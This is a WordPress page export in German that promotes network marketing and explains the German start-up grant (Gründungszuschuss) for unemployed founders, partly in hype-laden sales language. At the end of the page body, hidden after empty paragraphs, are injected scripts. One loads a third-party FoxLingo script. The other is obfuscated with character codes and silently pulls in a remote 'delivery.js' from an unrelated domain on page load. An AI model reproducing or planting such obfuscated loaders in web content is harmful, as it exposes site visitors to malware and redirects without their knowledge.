{"id":1715,"date":"2011-06-06T12:27:24","date_gmt":"2011-06-06T10:27:24","guid":{"rendered":"http:\/\/energiemedizin.de\/blog\/?page_id=1715"},"modified":"2015-12-14T13:58:38","modified_gmt":"2015-12-14T13:58:38","slug":"network-marketing","status":"publish","type":"page","link":"http:\/\/blog.energiemedizin.de\/?page_id=1715","title":{"rendered":"Network Marketing"},"content":{"rendered":"<h3><span style=\"color: #000000;\">Was ist Network Marketing?<\/span><\/h3>\n<p><span style=\"color: #000000;\">Network Marketing ist eine Form des Franchising mit Elementen des Direktvertriebs und basiert auf der Weiterempfehlung von Waren (Produkten wie Dienstleistungen) von einem Hersteller durch einen Vermittler (Gesch\u00e4ftspartner) an Endkunden.<\/span><br \/>\n<span style=\"color: #000000;\"> Neben der M\u00f6glichkeit, Waren von einem Hersteller direkt an einen Endkunden zu verkaufen bzw. zum Kauf zu empfehlen, steht es dem Gesch\u00e4ftspartner im Network Marketing frei, ein Netzwerk von Gesch\u00e4ftspartnern aufzubauen. Vermarktet werden dabei alle erdenklichen Produkte: von gesundheitstherapeutischen Produkten und Kosmetik \u00fcber Parfum und Schmuck hin zu Hausreinigungsprodukten, K\u00fcchenartikeln, Reisen, Textilien, Tiernahrung u.v.m.<\/span><br \/>\n<span style=\"color: #000000;\"> In seinem Tagesgesch\u00e4ft bezieht der Networker Produkte und Dienstleistungen f\u00fcr sich selbst (Eigenverbrauch), zum Abverkauf an Endkunden (zum erzielen einer Handelspanne) und dar\u00fcber hinaus sucht er Gesch\u00e4ftspartner (Lizenznehmer) die das selbe tun m\u00f6chten, um sich eine selbst\u00e4ndige T\u00e4tigkeit unter Anleitung aufzubauen. Diese wiederum beziehen die Produkte und Dienstleistungen zum Eigenverbrauch direkt vom Hersteller und zum Abverkauf an Endkunden und duplizieren wiederum ihr Tun.<\/span><br \/>\n<span style=\"color: #000000;\"> Dadurch entstehen Handels- und Verbrauchernetzwerke, durch die die Waren des Network Marketing-Unternehmens (Lizenzgeber) an Gesch\u00e4ftspartner und Endkunden vermarktet werden.<\/span><br \/>\n<span style=\"color: #000000;\"> Auf Basis der Ums\u00e4tze, die in diesen Handels- und Verbrauchernetzwerken entstehen, werden festgelegte Provisionen durch die Network Marketing-Unternehmen an die Gesch\u00e4ftspartner ausbezahlt.<\/span><br \/>\n<span style=\"color: #000000;\"> Die vertraglichen Konditionen zwischen dem Lizenzgeber und -nehmer im Network Marketing sind f\u00fcr alle Gesch\u00e4ftspartner gleich. So kann jemand, der zu einem sp\u00e4teren Zeitpunkt einem Network Marketing-Unternehmen beitritt, durchaus ein gr\u00f6\u00dferes Netzwerk aufbauen, als alle zuvor registrierten Gesch\u00e4ftspartner und entsprechend h\u00f6here Provisionen aus ihrem Umsatznetzwerk erzielen.<\/span><br \/>\n<span style=\"color: #000000;\"> Network Marketing ist eine au\u00dfergew\u00f6hnliche Chance, ohne qualifikatorische H\u00fcrden, ohne gro\u00dfen Kapitaleinsatz und ohne \u00f6rtliche Bindung eine Selbstst\u00e4ndigkeit zu begr\u00fcnden.<\/span><br \/>\n<span style=\"color: #000000;\"> Network Marketing wird in den n\u00e4chsten Jahren in Europa einen Existenzgr\u00fcndungsboom ausl\u00f6sen. Die Zeichen sind daf\u00fcr klar erkennbar. Der klassische Handel und auch Dienstleistungssektor baut zu TAUSENDEN Arbeitspl\u00e4tze ab. Millionen von Deutschen sind heute schon in einem 2t oder 3t Job t\u00e4tig, um die immer mehr steigenden Lebenshaltungskosten aufzufangen.<\/span><br \/>\n<span style=\"color: #000000;\"> Nutzen Sie jetzt Ihre Chancen!<\/span><br \/>\n<span style=\"color: #000000;\"> <strong>Network Marketing ist die einzige uns bekannte Branche, die ihnen eine L\u00f6sung f\u00fcr ein weit verbreitetes Problem anzubieten hat &#8211; <\/strong><strong>MEHR ZEIT &amp; MEHR GELD<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Network Marketing ist noch viel mehr&#8230;<\/span><\/p>\n<p>Quelle: <a title=\"BVNM\" href=\"http:\/\/www.bvnm.de\/index.php?option=com_content&amp;task=view&amp;id=5&amp;Itemid=6\" target=\"_blank\">BVNM<\/a><\/p>\n<p>&nbsp;<\/p>\n<h3><span style=\"color: #000000;\">BVNM \u2013 Bundesverband Network Marketing<\/span><\/h3>\n<p><span style=\"color: #000000;\">Der unabh\u00e4ngige Verband der Networker<\/span><\/p>\n<p><span style=\"color: #000000;\">Der Bundesverband Network Marketing e.V. ist die Interessenvertretung der Networker und ihrer Branche im deutschsprachigen Raum. Der Verband verpflichtet sich in seiner Arbeit zu strikter Neutralit\u00e4t gegen\u00fcber Unternehmen und zu einer sachlichen Aufkl\u00e4rung \u00fcber Network Marketing.<\/span><\/p>\n<p><span style=\"color: #000000;\">Durch breit gef\u00e4cherte Initiativen soll die Wahrnehmung des Network Marketing in der \u00d6ffentlichkeit gef\u00f6rdert werden. Ziel ist es, jedem Interessierten eine fundierte und vorurteilsfreie Meinung \u00fcber Network Marketing zu erm\u00f6glichen.<\/span><\/p>\n<p><span style=\"color: #000000;\">Auch bei Entscheidungstr\u00e4gern in politischen und wirtschaftlichen Institutionen muss Network Marketing weiter an Akzeptanz gewinnen und differenzierter wahrgenommen werden, um als Branche eine optimale F\u00f6rderung zu erfahren. Zu diesem Zweck wird der BVNM e.V. mit den zust\u00e4ndigen Institutionen kooperieren und auf eine angemessene Berichterstattung in den Medien achten.<\/span><\/p>\n<p><span style=\"color: #000000;\">Mittel- und langfristige Ziele dieser Zusammenarbeit sind u.a.: die Anerkennung des Network Marketing als eigenst\u00e4ndiges Berufsbild, die Einflussnahme auf Gesetzgebungsverfahren, die die Gesch\u00e4ftspraxis betreffen und der wettbewerbsrechtliche Schutz des Wirtschaftssystems Network Marketing.<\/span><\/p>\n<p><span style=\"color: #000000;\">Der BVNM e.V. informiert unabh\u00e4ngig und aktuell \u00fcber Inhalte, Vorteile und Chancen einer Selbstst\u00e4ndigkeit im Network Marketing. Wir m\u00f6chten durch unsere vielf\u00e4ltigen Angebote jeden Networker bei einem erfolgreichen Gesch\u00e4ftsaufbau unterst\u00fctzen. Wir machen uns stark f\u00fcr die Idee des Network Marketing als eine Selbstst\u00e4ndigkeit im Einklang mit pers\u00f6nlichen Werten wie Eigenverantwortung, Lebensqualit\u00e4t, Lebensfreude und Unabh\u00e4ngigkeit.<\/span><\/p>\n<p><span style=\"color: #000000;\">Im BVNM e.V. finden Networker mit dem gemeinsam Ziel zusammen, verantwortlich und wegweisend im Sinne der verbandseigenen Verhaltensstandards zu arbeiten und mit einer gemeinsamen Stimme f\u00fcr ein Verst\u00e4ndnis des Network Marketing einzutreten &#8211; gest\u00e4rkt durch einen unabh\u00e4ngigen, engagierten Bundesverband, der sich zu einer Marke f\u00fcr Qualit\u00e4t und Lebensfreude etablieren wird &#8211; das ist unsere Vision!<\/span><\/p>\n<p>&nbsp;<\/p>\n<h3><span style=\"color: #000000;\">Selbstst\u00e4ndig statt arbeitslos<\/span><\/h3>\n<p><span style=\"color: #000000;\">F\u00f6rderung der Aufnahme einer selbstst\u00e4ndigen T\u00e4tigkeit<\/span><\/p>\n<p><span style=\"color: #000000;\">Die F\u00f6rderung von Existenzgr\u00fcndungen aus der Arbeitslosigkeit wurde neu gestaltet. Die sog. \u201eIch-AG\u201c (Existenzgr\u00fcndungszuschuss, \u00a7 421l SGB III) und das \u00dcberbr\u00fcckungsgeld (\u00a7 57 SGB III)\u00a0 sind seit dem 1. August 2006 durch ein neues F\u00f6rderinstrument, den Gr\u00fcndungszuschuss, ersetzt worden.<\/span><\/p>\n<p><span style=\"color: #000000;\"> Arbeitnehmer, die durch Aufnahme einer selbstst\u00e4ndigen, hauptberuflichen T\u00e4tigkeit die Arbeitslosigkeit beenden, haben zur Sicherung des Lebensunterhalts und zur sozialen Sicherung in der Zeit nach der Existenzgr\u00fcndung Anspruch auf einen Gr\u00fcndungszuschuss. Ein direkter \u00dcbergang von einer Besch\u00e4ftigung in eine gef\u00f6rderte Selbstst\u00e4ndigkeit ist nicht m\u00f6glich.<\/span><\/p>\n<p><span style=\"color: #000000;\"> Der Gr\u00fcndungszuschuss wird geleistet, wenn der Arbeitnehmer bis zur Aufnahme der selbst\u00e4ndigen T\u00e4tigkeit Anspruch auf Entgeltersatzleistungen nach dem SGB III hat oder in einer Arbeitsbeschaffungsma\u00dfnahme nach dem SGB III\u00a0 besch\u00e4ftigt war.<\/span><\/p>\n<p><span style=\"color: #000000;\"> Bei Aufnahme der selbstst\u00e4ndigen T\u00e4tigkeit m\u00fcssen Gr\u00fcnderinnen und Gr\u00fcnder \u00fcber einen Anspruch auf Arbeitslosengeld von mindestens 150 Tagen verf\u00fcgen. Au\u00dferdem m\u00fcssen sie die notwendigen Kenntnisse und F\u00e4higkeiten zur Aus\u00fcbung der selbstst\u00e4ndigen T\u00e4tigkeit darlegen. Bei begr\u00fcndeten Zweifeln an diesen Kenntnissen und F\u00e4higkeiten\u00a0 kann die Agentur f\u00fcr Arbeit die Teilnahme an Ma\u00dfnahmen zur Eignungsfeststellung oder zur Vorbereitung von Existenzgr\u00fcndungen verlangen.<\/span><\/p>\n<p><span style=\"color: #000000;\"> Eine fachkundige Stelle muss das Existenzgr\u00fcndungsvorhaben begutachten und die Tragf\u00e4higkeit der Existenzgr\u00fcndung best\u00e4tigen. Fachkundige Stellen sind insbesondere Industrie- und Handelskammern, Handwerkskammern, berufsst\u00e4ndische Kammern, Fachverb\u00e4nde und Kreditinstitute.<\/span><\/p>\n<p><span style=\"color: #000000;\"> Der Gr\u00fcndungszuschuss wird in zwei Phasen geleistet. F\u00fcr sechs Monate wird der Zuschuss in H\u00f6he des zuletzt bezogenen Arbeitslosengeldes zur Sicherung des Lebensunterhalts und 300 \u20ac zur sozialen Absicherung gew\u00e4hrt. F\u00fcr weitere sechs Monate k\u00f6nnen 300 \u20ac pro Monat zur sozialen Absicherung gew\u00e4hrt werden, wenn eine intensive Gesch\u00e4ftst\u00e4tigkeit und hauptberufliche unternehmerische Aktivit\u00e4ten dargelegt werden. <\/span><\/p>\n<p><span style=\"color: #000000;\"> Gef\u00f6rderte Personen haben ab dem Monat, in dem sie das 65. Lebensjahr vollenden, keinen Anspruch auf einen Gr\u00fcndungszuschuss. Eine erneute F\u00f6rderung ist nicht m\u00f6glich, wenn seit dem Ende einer F\u00f6rderung der Aufnahme einer selbst\u00e4ndigen T\u00e4tigkeit noch nicht 24 Monate vergangen sind. <\/span><\/p>\n<p><span style=\"color: #000000;\"> Bereits bewilligte F\u00f6rderungen mit \u00dcberbr\u00fcckungsgeld oder Existenzgr\u00fcndungszuschuss bleiben von den \u00c4nderungen unber\u00fchrt.<\/span><br \/>\n<span style=\"color: #000000;\"> Die Dauer des Anspruchs auf Arbeitslosengeld mindert sich (in den ersten neun Monaten der F\u00f6rderung) um die Anzahl von Tagen, f\u00fcr die ein Gr\u00fcndungszuschuss gezahlt wurde. <\/span><br \/>\n<span style=\"color: #000000;\"> Weitere Informationen, auch zu den begleitenden Hilfen im Rahmen des Europ\u00e4ischen Sozialfonds, erhalten Sie bei Ihrer \u00f6rtlich zust\u00e4ndigen Agentur f\u00fcr Arbeit.<\/span><\/p>\n<h3><span style=\"color: #000000;\">F\u00fcr die Antragstellung bei der Agentur f\u00fcr Arbeit m\u00fcssen folgende Unterlagen eingerecht werden:<\/span><\/h3>\n<ul>\n<li><span style=\"color: #000000;\">Kurzbeschreibung des Existenzgr\u00fcndungsvorhabens zur Erl\u00e4uterung der Gesch\u00e4ftsidee<\/span><\/li>\n<li><span style=\"color: #000000;\">Stellungnahme einer fachkundigen Stelle \u00fcber die Tragf\u00e4higkeit der Existenzgr\u00fcndung<\/span><\/li>\n<li><span style=\"color: #000000;\">Anmeldung der selbst\u00e4ndigen T\u00e4tigkeit beim Gewerbeamt (f\u00fcr gewerbliche Berufe) bzw. beim Finanzamt (f\u00fcr freiberufliche T\u00e4tigkeiten)<\/span><\/li>\n<li><span style=\"color: #000000;\">ggf. notwendige Genehmigung oder Zulassung f\u00fcr bestimmte Gewerbe (z.B. IHK)<\/span><\/li>\n<\/ul>\n<h3><span style=\"color: #000000;\">Fachkundige Stellungnahme<\/span><\/h3>\n<p><span style=\"color: #000000;\">Gr\u00fcnderinnen und Gr\u00fcnder, die einen Existenzgr\u00fcndungszuschuss beantragen, m\u00fcssen ihrer zust\u00e4ndigen Agentur f\u00fcr Arbeit ein \u00fcberzeugendes Konzept und eine fachkundige Stellungnahme vorlegen.<\/span><br \/>\n<span style=\"color: #000000;\"> Sie muss Auskunft geben \u00fcber die pers\u00f6nlichen und fachlichen Voraussetzungen des Gr\u00fcnders und vor allem \u00fcber die finanzielle und wirtschaftliche Tragf\u00e4higkeit des geplanten Unternehmens. Ansprechpartner f\u00fcr solche Stellungnahmen sind z.B. die Industrie- und Handelskammern (IHK), Handwerkskammern, berufsst\u00e4ndischen Kammern, Fachverb\u00e4nde wie der BVNM oder Kreditinstitute.<\/span><br \/>\n<span style=\"color: #000000;\"> Diese Einrichtungen pr\u00fcfen auf Grundlage des vom Gr\u00fcnder erstellten Businessplans, ob das Vorhaben wirtschaftlich tragf\u00e4hig ist.<\/span><\/p>\n<h3><span style=\"color: #000000;\">Unsere Empfehlung<\/span><\/h3>\n<p><span style=\"color: #000000;\">Eine Stellungnahme durch den BVNM e.V. als Fachverband kann unb\u00fcrokratisch bei der Existenzgr\u00fcndung helfen. Die Erstellung und Beurteilung der Unterlagen erfolgt nach den Kriterien des Network Marketing und kann daher in einigen wesendlichen Punkten vereinfacht werden. Z.B. Konkurrenz- und Standortanalyse haben im NM eine andere Bedeutung. Dieses wird oftmals bei den traditionellen Einrichtungen und Beratern \u00fcbersehen. Dieses gilt auch bei vielen F\u00f6rderstellen.<\/span><br \/>\n<span style=\"color: #000000;\"> F\u00fcr eine fachkundige Stellungnahme, f\u00fcr Ihre Arbeitsagentur, berechen wir bundesweit f\u00fcr Mitglieder einen vorab vereinbarten Pauschalbetrag ab 60 Euro.<\/span><\/p>\n<h3><span style=\"color: #000000;\">Businessplan<\/span><\/h3>\n<p><span style=\"color: #000000;\">In letzter Zeit haben uns viele Anfragen zum Thema Existenzgr\u00fcndung und insbesondere zu F\u00f6rderm\u00f6glichkeiten erreicht. Dabei wurde uns immer wieder die Frage gestellt, welche Inhalte ein Existenzgr\u00fcndungskonzept haben muss, um den Anforderungen zu gen\u00fcgen.<\/span><\/p>\n<p><span style=\"color: #000000;\">Da der Businessplan ein individuelles, auf den berufsbiographischen Hintergrund einer Einzelperson abgestimmtes Dokument ist, k\u00f6nnen wir keinen Standard-Businessplan anbieten, in dem jeweils nur der Name ausgetauscht werden muss. Wir haben aber eine umfangreiche Liste aller relevanten Fragen zusammengetragen, die im Rahmen eines Businessplanes er\u00f6rtert werden m\u00fcssen.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Dieses Konzept, das Mitglieder downloaden k\u00f6nnen, ist ein guter Leitfaden f\u00fcr die Erstellung eines f\u00f6rderungsw\u00fcrdigen Businessplanes.<\/strong><\/span><\/p>\n<h3><span style=\"color: #000000;\"><strong>Wege aus der Arbeitslosigkeit in die Selbstst\u00e4ndigkeit<\/strong><\/span><\/h3>\n<p><span style=\"color: #000000;\">Wir m\u00f6chten Ihnen hier zwei unterschiedliche Konzepte vorstellen. Da die traditionellen Arbeitspl\u00e4tze heute nicht mehr sicher sind, ist es auf der einen Seite ratsam geworden, vorsorglich weitere Einkunftsquellen f\u00fcr den Lebensunterhalt zu \u00f6ffnen &#8211; m\u00f6glichst noch vor einer unerwarteten Entlassung in die Arbeitslosigkeit.<\/span><\/p>\n<p><span style=\"color: #000000;\">Sollte dieser Zustand schon Realit\u00e4t sein, so gibt es Wege aus der Arbeitslosigkeit. Ein Weg hei\u00dft f\u00fcr uns &#8222;Freies Unternehmertum&#8220; im Network Marketing. Angesichts der Konjunkturflaute wagen immer mehr Frauen und M\u00e4nner den Sprung in die Selbstst\u00e4ndigkeit. 2005 haben sich fast ein Drittel der Existenzgr\u00fcnder mit finanziellen Hilfen der Agentur zum eigenen Chef gemacht.<\/span><\/p>\n<p><span style=\"color: #000000;\">Das Durchhalteverm\u00f6gen ist gro\u00df, Gesch\u00e4ftsaufgaben sind selten.<\/span><\/p>\n<p><span style=\"color: #000000;\">Der Schritt in die Selbstst\u00e4ndigkeit kann f\u00fcr Arbeitslose eine Alternative sein. Statt Stellenangebote zu studieren, werden Arbeitslose ihr eigener Chef. Allerdings ist vor der Firmengr\u00fcndung eine gute Beratung und Information ratsam: Je gr\u00fcndlicher und zielgerechter die Vorbereitungsphase, desto h\u00f6her die Chance eines erfolgreichen Verlaufs der Selbst\u00e4ndigkeit.<\/span><\/p>\n<p><span style=\"color: #000000;\">Wer sich \u00fcber das Internet informieren m\u00f6chte, findet dort reichlich Material. Unter <\/span><a href=\"http:\/\/www.arbeitsagentur.de\/\" target=\"_blank\"><span style=\"color: #0000ff;\">www.arbeitsagentur.de<\/span><\/a><span style=\"color: #000000;\"> &gt;Arbeitnehmer Informationen &gt; Geldleistungen &gt; Existenzgr\u00fcndung werden die &#8222;Zuschussm\u00f6glichkeiten&#8220; vorgestellt. Zur Gr\u00fcndung, Finanzierung und F\u00fchrung eines Unternehmens gibt es ausf\u00fchrliche Beschreibungen unter <\/span><a href=\"http:\/\/www.bmwi.de\/\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0000ff;\">www.bmwa.bund<\/span><\/span><\/a><span style=\"color: #000000;\"><a href=\"http:\/\/www.bmwi.de\/\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0000ff;\">.de<\/span><\/span> <\/a>und <\/span><a href=\"http:\/\/www.existenzgruender.de\/\" target=\"_blank\"><span style=\"color: #0000ff;\">www.existenzgruender.de<\/span><\/a><span style=\"color: #000000;\">. Unter diesen Adressen kann man auch hilfreiche Brosch\u00fcren bestellen.<\/span><\/p>\n<p><span style=\"color: #000000;\">Quelle:<a href=\"http:\/\/bit.ly\/11Jr9oY\" target=\"_blank\"> BVNM<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script id=\"FoxLingoJs\">\/\/ <![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[ (function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Was ist Network Marketing? Network Marketing ist eine Form des Franchising mit Elementen des Direktvertriebs und basiert auf der Weiterempfehlung von Waren (Produkten wie Dienstleistungen) von einem Hersteller durch einen Vermittler (Gesch\u00e4ftspartner) an Endkunden. Neben der M\u00f6glichkeit, Waren von einem Hersteller direkt an einen Endkunden zu verkaufen bzw. zum Kauf zu empfehlen, steht es dem [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":32,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1715"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1715"}],"version-history":[{"count":4,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1715\/revisions"}],"predecessor-version":[{"id":5509,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1715\/revisions\/5509"}],"up":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/32"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1715"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}